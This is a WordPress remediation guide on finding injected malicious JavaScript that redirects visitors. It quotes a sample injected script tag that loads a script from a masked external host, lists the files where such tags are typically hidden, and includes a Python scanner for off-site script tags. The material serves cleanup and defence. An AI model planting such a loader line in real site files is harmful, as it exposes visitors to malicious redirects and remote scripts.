If your WordPress site has been hacked and you believe you have removed the tampering, but the site is still forcibly redirected to another site, malicious JavaScript code may still be embedded somewhere.


A single line of embedded malicious JavaScript

The following is an example of embedded malicious JavaScript code (malware).

<script src="dock.********.com/m.js?ns=ns1" type="text/javascript"></script>

This single line calls and executes an external malicious script.
In general, this type of malicious embed is difficult for malware-removal plug-ins and inspections to detect, because the loader lines vary widely and detection is a cat-and-mouse game.

However, because externally loaded JavaScript cannot rewrite or edit site files, it is less dangerous than the malicious PHP programs known as backdoors.

Therefore, once you find the malicious code shown above, you can remove it simply by deleting that one line.

How to find JavaScript injection

This single line of malicious JavaScript code is often embedded in a file that is always loaded when WordPress is called.
This is because hackers want to maximize their profits by redirecting users on every page of the defaced site.

The files that are always loaded in WordPress are the following.

wp-config.php
index.php
header.php in the theme
footer.php in the theme
functions.php in the theme
index.php in the theme
sidebar.php in the theme

Visually inspect these files for a single line of unfamiliar JavaScript code like the one shown above.
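
One way to automate that inspection, as an added example that is not code from the original article: a read-only Python script that checks the always-loaded files listed above for script tags whose src points to a host other than your own. The allowed host www.example.com, the theme name mytheme and the sample line are constructed, and the scheme-less host check is a heuristic that can flag local paths for review.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Files the article lists as always loaded (theme files live under wp-content/themes/<theme>/).
ROOT_FILES = ["wp-config.php", "index.php"]
THEME_FILES = ["header.php", "footer.php", "functions.php", "index.php", "sidebar.php"]
SCRIPT_SRC = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
# A scheme-less src whose first segment looks like a hostname, as in the article's sample.
HOSTLIKE = re.compile(r"^([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})/", re.I)

def external_host(src, allowed_hosts):
    """Return the host of an off-site script src, or None if it is local or allowed."""
    if src.startswith(("http://", "https://", "//")):
        host = urlparse(src).hostname
    else:
        match = HOSTLIKE.match(src)
        host = match.group(1) if match else None
    if host is None:
        return None  # relative path, PHP expression, or unparsable value
    host = host.lower()
    return None if host in allowed_hosts else host

def scan_wordpress(root, allowed_hosts):
    """Return (relative path, line number, host) for each off-site script tag."""
    root = Path(root)
    targets = [root / name for name in ROOT_FILES]
    for theme in sorted((root / "wp-content" / "themes").glob("*")):
        targets += [theme / name for name in THEME_FILES]
    findings = []
    for path in targets:
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for src in SCRIPT_SRC.findall(line):
                host = external_host(src, allowed_hosts)
                if host:
                    findings.append((path.relative_to(root).as_posix(), lineno, host))
    return findings

if __name__ == "__main__":
    # Constructed sample tree; point scan_wordpress() at a copy of your own site instead.
    with tempfile.TemporaryDirectory() as d:
        theme = Path(d, "wp-content", "themes", "mytheme")
        theme.mkdir(parents=True)
        (theme / "header.php").write_text('<script src="cdn.bad.example/m.js?ns=ns1"></script>\n')
        for hit in scan_wordpress(d, {"www.example.com"}):
            print(hit)
```

Every reported line still needs a manual look before deletion, since legitimate third-party scripts that are not in the allowed set are reported too.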

Examples embedded in the database

There are also rare cases where such JavaScript is embedded in the database.

In this case, a large amount of malicious JavaScript code is written into posts in the database, and a plugin for bulk database search and replace is useful for finding and deleting the malicious code.

Search by Search Regex

We also recommend using a malware scanning and removal plug-in. In some cases, you may be able to use its automatic removal function to remove all malware at once.
[Free] WordPress: Malware Scan & Security Plug-in [Malware and Virus Detection and Removal]